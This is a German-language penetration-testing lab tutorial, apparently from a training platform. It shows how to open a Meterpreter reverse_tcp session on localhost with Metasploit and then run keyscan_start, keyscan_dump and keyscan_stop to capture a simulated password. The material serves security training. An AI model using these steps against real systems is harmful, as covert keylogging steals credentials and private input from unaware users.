Tastatureingaben auf einem Zielsystem mit Meterpreter protokollieren

RedisBeginner
Jetzt üben

Einleitung

In diesem Labor werden Sie eine gängige Post-Exploitation-Technik untersuchen: das Keystroke Logging. Keystroke Logging, oder "Keylogging", ist der Prozess der Aufzeichnung der auf einer Tastatur angeschlagenen Tasten, typischerweise heimlich, sodass die Person, die die Tastatur benutzt, nicht bemerkt, dass ihre Aktionen überwacht werden. Beim Penetration Testing ist diese Technik von unschätzbarem Wert für das Sammeln sensibler Informationen wie Benutzernamen, Passwörter und anderer vertraulicher Daten.

Wir werden das leistungsstarke Payload von Metasploit Framework, Meterpreter, verwenden, um dies zu erreichen. Meterpreter verfügt über ein integriertes Modul namens keyscan, das es einem Angreifer ermöglicht, auf einem kompromittierten System einfach einen Keylogger zu starten, auszulesen und zu stoppen. In diesem Labor lernen Sie, wie Sie eine Meterpreter-Sitzung erhalten, den Keylogger einsetzen, Tastatureingaben erfassen und dann Ihre Spuren verwischen.

Eine Meterpreter-Sitzung auf einem Ziel erlangen

In diesem Schritt richten wir einen Listener in Metasploit ein und führen ein Payload aus, um eine Meterpreter-Sitzung zu erhalten. Für dieses Labor agieren wir sowohl als Angreifer als auch als Ziel auf derselben Maschine. Eine Payload-Datei namens payload.elf wurde bereits für Sie im Verzeichnis ~/project erstellt.

Zuerst starten wir die Metasploit Framework-Konsole.

msfconsole -q

Sobald msfconsole geladen ist, müssen wir einen Handler einrichten, der auf die eingehende Verbindung von unserem Payload wartet.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Führen Sie nun den Listener als Hintergrundjob mit dem Flag -j aus.

exploit -j

Sie sollten sehen, dass der Handler gestartet wurde.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Öffnen Sie nun einen neuen Terminal-Tab, indem Sie auf das +-Symbol im Terminal-Panel klicken. Führen Sie in diesem neuen Tab das Payload aus.

./payload.elf

Wechseln Sie zurück zu Ihrem ersten Terminal-Tab mit msfconsole. Sie sollten eine Meldung sehen, die anzeigt, dass eine Meterpreter-Sitzung geöffnet wurde.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400

Um mit dieser neuen Sitzung zu interagieren, verwenden Sie den Befehl sessions.

sessions -i 1

Ihr Prompt sollte sich zu meterpreter> ändern, was anzeigt, dass Sie nun die Kontrolle über die Ziel-Sitzung haben.

[*] Starting interaction with 1...

meterpreter >

Starten des Keystroke Loggers mit dem Befehl keyscan_start

In diesem Schritt, mit einer aktiven Meterpreter-Sitzung, starten wir den Keystroke Logger auf der Zielmaschine. Der Befehl dafür lautet keyscan_start. Dieser Befehl injiziert einen Keylogger in einen Prozess auf dem Zielsystem und beginnt, alle Tastatureingaben zu erfassen.

Stellen Sie sicher, dass Sie sich am meterpreter> Prompt befinden. Geben Sie den folgenden Befehl ein und drücken Sie Enter:

keyscan_start

Das System bestätigt, dass der Keylogger gestartet wurde.

Starting the keystroke sniffer...

Der Logger läuft nun still im Hintergrund auf dem Zielsystem und zeichnet jede gedrückte Taste auf.

Warten, bis der Benutzer Informationen eingibt

In diesem Schritt simulieren wir, dass ein Benutzer sensible Informationen auf der Zielmaschine eingibt. Da unser Keylogger aktiv ist, wird er diese Aktivität erfassen.

Öffnen Sie erneut einen neuen Terminal-Tab, indem Sie auf das +-Symbol klicken. In diesem neuen Terminal simulieren wir, dass ein Benutzer ein Passwort eingibt. Sie können jeden Befehl eingeben, aber für dieses Beispiel verwenden wir echo, um die Eingabe eines geheimen Passworts zu simulieren.

echo "MySuperSecretPassword123"

Nachdem Sie den Befehl ausgeführt haben, können Sie diesen neuen Terminal-Tab schließen. Die Tastatureingaben für echo "MySuperSecretPassword123" wurden nun von unserem laufenden Keylogger erfasst. Kehren Sie zu dem Terminal-Tab zurück, in dem Ihre Meterpreter-Sitzung aktiv ist.

Die erfassten Tastatureingaben mit dem Befehl keyscan_dump auslesen

In diesem Schritt rufen wir die Tastatureingaben ab, die vom Logger erfasst wurden. Der Befehl keyscan_dump holt alle aufgezeichneten Tastatureingaben von der Zielmaschine und zeigt sie in Ihrer Meterpreter-Konsole an.

Führen Sie am meterpreter> Prompt den folgenden Befehl aus:

keyscan_dump

Sie sehen die Ausgabe aller Tastatureingaben, die seit dem Start des Loggers erfasst wurden. Dies beinhaltet den Befehl, den Sie im vorherigen Schritt eingegeben haben.

Dumping captured keystrokes...

echo "MySuperSecretPassword123"

Wie Sie sehen können, wurde der Befehl, den wir in dem anderen Terminal eingegeben haben, erfolgreich erfasst. Dies zeigt, wie ein Angreifer Anmeldeinformationen, Befehle und andere sensible Texte, die von einem Benutzer eingegeben werden, stehlen kann.

Den Keylogger mit keyscan_stop stoppen

In diesem Schritt stoppen wir den Keylogger. Für einen Penetrationstester ist es entscheidend, nach einem Engagement aufzuräumen, um alle Artefakte zu entfernen und alle laufenden Prozesse zu beenden, sodass das Zielsystem so hinterlassen wird, wie es vorgefunden wurde.

Um den Keylogger zu stoppen, verwenden Sie den Befehl keyscan_stop in Ihrer Meterpreter-Sitzung.

keyscan_stop

Das System bestätigt, dass der Keylogger gestoppt wurde.

Stopping the keystroke sniffer...

Der Keylogger ist auf der Zielmaschine nicht mehr aktiv. Sie können nun die Meterpreter-Sitzung und msfconsole sicher beenden, indem Sie zweimal exit eingeben.

Zusammenfassung

In diesem Labor haben Sie erfolgreich gelernt, wie Sie mit Meterpreter Tastatureingaben auf einem Zielsystem protokollieren. Sie haben den gesamten Lebenszyklus dieser Post-Exploitation-Technik geübt, vom Erlangen einer Sitzung bis zum Aufräumen Ihrer Werkzeuge.

Sie haben gelernt, wie Sie:

  • Eine Meterpreter-Sitzung mit einem Handler und einer Payload aufbauen.
  • Den Keylogger auf einem Ziel mit dem Befehl keyscan_start starten.
  • Die erfassten Tastatureingaben mit keyscan_dump auslesen, um sensible Informationen anzuzeigen.
  • Den Keylogger stoppen und die Sitzung mit keyscan_stop bereinigen.

Dies ist eine leistungsstarke Technik, die die Bedeutung von Systemsicherheit und -überwachung hervorhebt. Denken Sie daran, diese Fähigkeiten verantwortungsbewusst und ethisch einzusetzen. Herzlichen Glückwunsch zum Abschluss des Labors!